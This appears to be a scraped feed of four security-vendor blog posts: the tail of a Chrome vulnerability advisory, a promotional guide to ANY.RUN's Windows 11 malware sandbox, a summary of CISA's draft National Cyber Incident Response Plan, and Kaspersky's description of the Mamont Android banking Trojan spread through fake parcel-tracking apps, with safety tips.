In addition to contributions from external researchers, Google’s internal security teams continue to conduct audits, fuzzing, and other security initiatives to proactively identify and fix vulnerabilities.

Why Prompt Updates Are Crucial

  1. Rapid Threat Exploitation: Attackers often exploit known vulnerabilities within days of disclosure. Delaying updates leaves systems vulnerable.

  2. Prevention of Data Breaches: Remote code execution could allow attackers to access sensitive data, including saved passwords and browsing history.

  3. System Stability: Updating ensures that your browser runs smoothly without crashes caused by these vulnerabilities.

Best Practices for Safe Browsing

In addition to updating Google Chrome, here are some best practices to stay secure:

  1. Enable Automatic Updates: Keep your browser and software up-to-date.

  2. Use Security Extensions: Install reliable security extensions to block malicious content.

  3. Avoid Suspicious Links: Do not click on unknown or untrusted links in emails or messages.

  4. Enable Site Isolation: Chrome’s Site Isolation feature helps contain exploits.

  5. Regular Security Scans: Use antivirus software to detect and prevent malicious activity.

  6. Check Permissions: Regularly review website permissions (e.g., camera, microphone) to limit exposure.

Conclusion

The multiple vulnerabilities identified in Google Chrome highlight the importance of timely software updates to ensure system security and stability. The flaws—primarily Type Confusion in V8 and Use After Free in Translate—can be exploited by attackers to execute arbitrary code, cause system crashes, or steal sensitive data.

All users of Google Chrome for Desktop are urged to update their browsers to the latest stable version (131.0.6778.139/.140) without delay. By applying updates and following safe browsing practices, users can significantly reduce the risk of cyberattacks and ensure a secure online experience.

At Cyble, we remain committed to helping organizations stay ahead of evolving cyber threats through continuous threat monitoring and actionable intelligence. Stay informed, stay secure.

Schedule a demo today to see how Cyble can safeguard your systems against emerging vulnerabilities and cyber threats.

Source:

The post Multiple Vulnerabilities in Google Chrome for Desktop: Update to Stay Secure appeared first on Cyble.

Blog – Cyble – ​Read More

How to Set up a Windows 11 Malware Sandbox

/in

As Windows 10 approaches its end-of-life (October 2025), organizations are facing the need to adjust their security infrastructure to be better aligned with Windows 11. A malware sandbox, an isolated environment for analyzing malicious files and URLs, is a key tool for this transition.

Here are the benefits of deploying a Windows 11 sandbox and how you can do it.

What is a malware sandbox?

A malware sandbox is an isolated virtual environment designed to safely analyze cyber threats by detonating, observing, and interacting with them.

This controlled setting allows cybersecurity professionals to understand the behavior of malware post-infection, including file modifications, network calls, and registry changes.

A malware sandbox helps organizations and individual researchers to:

  • Safely explore malicious files and URLs to validate threat alerts or proactively identify cyber threats.
  • Observe detonation of malware and phishing attacks in real time to see how they are carried out in a live system.
  • Replicate specific network and system environments to assess the potential impact on the existing infrastructure.
  • Extract indicators of compromise from malware samples to enhance threat detection capabilities.
  • Intercept and analyze command and control communications to gather crucial IOCs.
  • Study malware behavior in depth to uncover tactics, techniques, and procedures (TTPs) to respond to security incidents or prepare for future attacks more effectively.

Analyze malware and phishing
in ANY.RUN’s Windows 11 sandbox 



Get a free trial


Which sandbox to choose? Built-in, on-premises, cloud-based

When it comes to choosing your sandbox, there are several options you can consider. Let’s focus on the three main ones.

Built-In Sandbox Feature Included with Windows 11

Windows 11 provides built-in sandbox functionality completely for free. This tool works well for quick checks, such as opening malicious links received via phishing emails or downloading and running suspicious files.

A limitation of this type of sandbox is its inability to provide verdicts on detonated malicious content or log system and network activities. This can make it difficult to accurately assess the threat level of evasive and complex malware. There are also no reports generated after the analysis.

These aspects make the built-in Windows sandbox an unsuitable option for professional use.

On-premises Windows 11 Sandbox

For more advanced analysis, organizations can opt for building their own sandbox environment, configured to their specific needs. Virtualization software like VirtualBox can be used here. Yet, this approach is generally recommended only if you need to reverse-engineer malware source code or analyze it with custom tools.

There are also a several things to take into consideration:

  • Complex Setup: Requires technical expertise to set up and configure.
  • Potential Risks: Misconfiguration can lead to malware escaping the sandbox and infecting the host system.
  • Resource-Intensive: Can be demanding on system resources.

Check out this guide on how to set up your own sandbox environment.

Cloud Malware Sandbox with Windows 11 Support

For professional malware analysis, a cloud sandbox is the best choice. These services offer all the benefits of virtualization software but with much less tinkering and setup, making it easier to gather deep insights. There’s also no chance to misconfigure something and let the malware escape the sandbox’s confines and infect the host.

The ANY.RUN sandbox is a tool that lets you configure and deploy a fully-interactive Windows 11 environment in seconds. It also provides you with the ability to engage with the system just like on a standard computer: launch programs, download attachments, browse web pages, and type.

Some malware families may rely on specific tools and mechanisms present in certain OS versions; running them on the wrong version may not trigger their malicious actions. That is why, apart from Windows 11, ANY.RUN provides other operating systems, including Windows 7, 10, and Ubuntu, letting you switch between them with ease.

Benefits of ANY.RUN’s Interactive Sandbox:

  • Quick and Easy Setup: Simply upload your file or link and start the analysis process in seconds.
  • Real-time Insights: Get an in-depth view of malicious activities, including network events, registry changes, dropped files, script execution, as they occur.
  • Interactivity: Perform user actions and see how threats respond in a live system.
  • Comprehensive Reporting: Collect detailed reports on analysis results, such as indicators of compromise (IOCs), malware families config info, and other actionable info.
  • VM Customization: Configure VM settings, enabling custom VPN, MITM Proxy, FakeNet, and other features for targeted investigations.
  • Privacy Control: Choose between public and private analysis based on data sensitivity.
  • Team Management: Invite, manage, and remove team members, with options for temporary access and productivity tracking.


Learn to analyze malware in a sandbox

Learn to analyze cyber threats

See a detailed guide to using ANY.RUN’s Interactive Sandbox for malware and phishing analysis


Read full guide


How to Set up a Windows 11 Sandbox

Let’s demonstrate how you can quickly get started with ANY.RUN’s Interactive Sandbox.

Step 1: Upload a Sample

ANY.RUN home screen lets you quickly upload your sample

First, create an account or log in and choose your upload option: a file or URL.

As an example, let’s upload a .bin file to the service.

Step 2: Configure the VM

ANY.RUN allows you configure your analysis system for each session

Once we submit the sample, we’ll be able to customize the analysis environment to fit our needs. Check out the ultimate guide to the ANY.RUN sandbox to learn more about the features available in the setup window.

For now, let’s select Windows 11 from the list of operating systems, set the privacy mode of the session, and run the analysis.

Step 3: Analyze the Threat

Analysis of a malicious file in the ANY.RUN sandbox

Once the session starts, the sandbox detonates the sample, allowing us to see how the system gets infected with the Amadey malware.

ANY.RUN identifies any malicious activities related to the spawned processes

Thanks to the Process Tree, we can discover that after the initial infection, Amadey continues to deploy additional malware, Lumma and Stealc.

Suricata IDS rule used for detecting C2 connections of the Lumma Stealer

Once these threats gain foothold on the system, they connect to their command and control (C2) servers, receive commands from threat actors, and begin to exfiltrate stolen data.

Conclusion

By providing a safe and isolated environment for analyzing malicious files and URLs, a malware sandbox helps enhance threat investigations and improve security. Organizations transitioning to Windows 11 need to utilize a reliable sandbox solution to effectively examine emerging malware and phishing attacks.

About ANY.RUN

ANY.RUN helps more than 500,000 cybersecurity professionals worldwide. Our interactive sandbox simplifies malware analysis of threats that target both Windows and Linux systems. Our threat intelligence products, TI Lookup, YARA Search and Feeds, help you find IOCs or files to learn more about the threats and respond to incidents faster.  

With ANY.RUN you can: 

  • Detect malware in seconds
  • Interact with samples in real time
  • Save time and money on sandbox setup and maintenance
  • Record and study all aspects of malware behavior
  • Collaborate with your team 
  • Scale as you need

Get a 14-day free trial to test all features of ANY.RUN’s Interactive Sandbox →

The post How to Set up a Windows 11 Malware Sandbox appeared first on ANY.RUN’s Cybersecurity Blog.

ANY.RUN’s Cybersecurity Blog – ​Read More

CISA Reveals Draft Update to National Cyber Incident Response Plan for Public Feedback

/in

Cyble National Cyber Incident Response Plan

Overview

The Cybersecurity and Infrastructure Security Agency (CISA) has published the draft update to the National Cyber Incident Response Plan (NCIRP) for public comment on the Federal Register. Developed through collaboration with the Joint Cyber Defense Collaborative (JCDC) and in close coordination with the Office of the National Cyber Director (ONCD), this update addresses new changes in cybersecurity and incorporates significant changes in policy, law, and operational processes since the plan’s initial release in 2016.

The NCIRP serves as the strategic framework guiding the U.S. response to cyber incidents. It aligns efforts across government agencies, private sector entities, state and local governments, tribal and territorial authorities, and international partners. The plan outlines four critical lines of effort (LOEs) to ensure a cohesive and coordinated approach to incident response: Asset Response, Threat Response, Intelligence Support, and Affected Entity Response. These efforts aim to manage cyber incidents of varying severity and ensure timely actions during the response lifecycle.

The release of this draft update marks an important step in enhancing the nation’s ability to respond effectively to cyber threats‘ growing complexity and sophistication. CISA has worked closely with government and industry partners to create an agile, actionable framework that keeps pace with their rapid evolution.

Key Updates to the National Cyber Incident Response Plan

Several critical updates have been introduced in this draft version of the NCIRP, which are designed to improve coordination and responsiveness during cyber incidents. These changes include:

  1. Defined Path for Non-Federal Stakeholder Participation: This update clarifies the process by which non-federal stakeholders, including private sector entities, can participate in cyber incident response efforts. Given the growing role of the private sector in cybersecurity, this path ensures more comprehensive engagement in the event of a major cyber incident.

  2. Improved Usability: The plan has been streamlined to enhance its usability. The updated version aligns with the operational lifecycle of incident response, making it more straightforward for agencies and organizations to implement during real-world incidents.

  3. Incorporation of Legal and Policy Changes: The draft incorporates the latest legal and policy developments impacting the roles and responsibilities of agencies involved in cyber incident response. These updates ensure that the plan is in line with current regulatory frameworks and legal requirements.

  4. Predictable Update Cycle: The NCIRP will now undergo regular updates, ensuring that it remains relevant as the threat landscape evolves. The predictable cycle will allow for continual refinement based on feedback, emerging threats, and changing technological realities.

In her statement on the publication of the draft update, CISA Director Jen Easterly emphasized the necessity of a seamless, agile, and effective incident response framework. She noted that “Today’s increasingly complex threat environment demands that we have a seamless, agile, and effective incident response framework” and encouraged public comment to refine the document further.

Overview of the National Cyber Incident Response Plan

The NCIRP is an important guide for coordinating responses to cyber incidents that could affect national security, the economy, or public health. The plan was initially published in 2016 and is an essential component of the U.S. government’s broader cybersecurity strategy. The 2023 National Cybersecurity Strategy called for the update to reflect new cyber threats, organizational changes, and policy shifts.

The NCIRP is not a step-by-step guide but rather a flexible framework for coordinating efforts during a cyber incident. It defines the roles and responsibilities of various stakeholders, including federal agencies, state, local, tribal, and territorial (SLTT) governments, private sector entities, and civil society organizations. By laying out these roles and mechanisms, the NCIRP fosters coordinated action across sectors and jurisdictions, ensuring that resources are deployed effectively during a crisis.

Four Lines of Effort for Cyber Incident Response

The NCIRP outlines four primary lines of effort that guide the U.S. government’s response to cyber incidents. These are:

  • Asset Response: Led by CISA, this effort focuses on helping affected entities protect their assets and mitigate the impacts of a cyber incident. It includes providing technical assistance to organizations and supporting them in securing critical infrastructure.

  • Threat Response: The Department of Justice (DOJ), the FBI, and the National Cyber Investigative Joint Task Force (NCIJTF) are responsible for leading efforts to neutralize cyber threats and track down cybercriminals. The FBI, in particular, plays a central role in law enforcement response and investigations.

  • Intelligence Support: The Office of the Director of National Intelligence (ODNI), through the Cyber Threat Intelligence Integration Center (CTIIC), provides essential intelligence to guide response efforts. This line of effort helps ensure that the U.S. government has the latest information on adversary tactics, techniques, and procedures (TTPs).

  • Affected Entity Response: In cases where a federal agency or private sector organization is directly impacted, it is responsible for leading its own response, though it coordinates with CISA, the Department of Defense (DOD), or other federal partners as needed. This effort is vital for managing the operational continuity of affected entities.

These lines of effort are managed through structured coordination bodies such as the Cyber Unified Coordination Group (Cyber UCG), which brings together stakeholders from across the government and the private sector to ensure unified, cohesive action. The Cyber Response Group (CRG) focuses on broader policy and strategic coordination, ensuring alignment with national cybersecurity priorities.

The Detection and Response Phases

Cyber incident response is broken down into two main phases: Detection and Response.

  1. Detection: This phase involves continuous monitoring, analysis, and engagement with critical infrastructure owners to validate whether an incident is significant enough to require a full-scale response. Detection includes analyzing anomalies, working with the cybersecurity community, and validating the severity of the incident.

  2. Response: Once an incident has been confirmed as significant, the response phase begins. This phase focuses on containment, eradication, and recovery, as well as supporting law enforcement in their efforts to attribute and hold perpetrators accountable. The response efforts also include supporting affected entities as they recover and restore services.

In both phases, the roles of federal agencies, SLTT governments, and private sector entities are critical. The JCDC plays a central role in coordinating public-private collaboration, ensuring that both sectors are aligned in their efforts to defend against and recover from cyber incidents.

Conclusion

The updated National Cyber Incident Response Plan (NCIRP) emphasizes continuous improvement and collaboration. After an incident, the Cyber Response Group (CRG) reviews the response and prepares a report, which helps refine future efforts. The Cyber Safety Review Board also provides independent recommendations to strengthen cybersecurity.

CISA is committed to regularly updating the NCIRP, incorporating feedback from the public and private sectors, and adapting to new threats and technologies. The Joint Cyber Defense Collaborative (JCDC) plays a key role in ensuring coordinated efforts. The updated NCIRP aims to strengthen national preparedness and ensure effective response to future cyber incidents.

References

The post CISA Reveals Draft Update to National Cyber Incident Response Plan for Public Feedback appeared first on Cyble.

Blog – Cyble – ​Read More

Mamont banker under the guise of a tracking app | Kaspersky official blog

/in

We’ve discovered a new scheme of distribution of the Mamont (Russian for mammoth) Trojan banker. Scammers promise to deliver a certain product at wholesale prices that may be considered interesting to small businesses as well as private buyers, and offer to install an Android application to track the package. However, instead of a tracking utility, the victim installs a Trojan that can steal banking credentials, push notifications, and other financial information.

Scheme details

The attackers claim to sell various products at fairly attractive prices via number of websites. To make a purchase, the victim is asked to join a private Telegram messenger chat, where instructions for placing an order are posted. In essence, these instructions boil down to the fact that the victim needs to write a private message to the manager. The channel itself exists to make the scheme look more convincing: participants of this chat ask clarifying questions, receive answers, and comment on things. Probably, there are both other victims of the same scheme and bots that create the appearance of active trading in this chat.

The scheme is made more credible by the fact that the scammers don’t require any prepayment — the victim gets the impression that they’re not risking anything by placing an order. But some time after talking to the manager and placing an order, the victim receives a message that the order has been sent, and its delivery can be tracked using a special application. A link to the .apk file and the tracking number of the shipment are included. The message additionally emphasizes that to pay for the order after receiving it, you must enter a tracking number and wait while the order is loading (which can take more than 30 minutes).

The link leads to a malicious site that offers to download a tracker for the sent parcel. In fact, it’s not a tracker, but the Mamont banking malware for Android. When installed, the “tracker” requests permission to operate in the background, as well as work with push notifications, SMS and calls. The victim is required to enter a code, supposedly for tracking the parcel, and wait.

What is this malware and why is it dangerous?

In fact, after the victim enters the received “track code”, which is apparently used as the victim’s identifier, the Trojan begins to intercept all push notifications received by the device (for example, confirmation codes for banking transactions) and forward them to the attackers’ server. At the same time, Mamont establishes a connection with the attackers’ server and waits for additional commands. Upon command, it can:

  • change the application icon to a transparent one to hide it from the victim;
  • forward all incoming SMS messages of the last three days to the attackers;
  • open an interface for uploading a photo from the phone’s gallery to the attackers’ server;
  • send an SMS to an arbitrary number.

In addition, the attackers can show the victim arbitrary text with boxes for entering additional information — this way they can manipulate the victim to submit additional credentials, or simply collect more information for further attacks using social engineering (for example, for threatening letters from regulators or law enforcement agencies). They probably steal photos from the gallery for the same purpose. This is especially dangerous if the victim is a small business owner: they often use their phone camera to quickly take photos of business information.

Our security solutions detect the malware distributed during this attack as Trojan-Banker.AndroidOS.Mamont.*. A more detailed technical description of the malware, as well as indicators of compromise, can be found in the dedicated Securelist blog post.

Targets of this scheme

This campaign is aimed exclusively at Russia-based users of Android smartphones. The attackers emphasize this and refuse to “deliver goods” anywhere else. However, cybercriminals’ tools often become freely available on the darknet, so it’s impossible to guarantee that users from other countries are immune to this threat.

How to stay safe

We recommend following simple safety rules to avoid infecting your smartphone with this (or any other) malware. This is especially true if the phone is used not only for personal needs, but also for business. Here are these simple safety rules:

  • be skeptical of especially-favorable offers of goods and services on the internet (if the price is significantly lower than the usual market price it means the seller’s benefiting in some other way);
  • do not run .apk files obtained from unknown sources – they should be installed from official stores or from the official resource of a specific service;
  • use a reliable security solution, which will prevent malware from being installed on your device and block malicious links.

Kaspersky official blog – ​Read More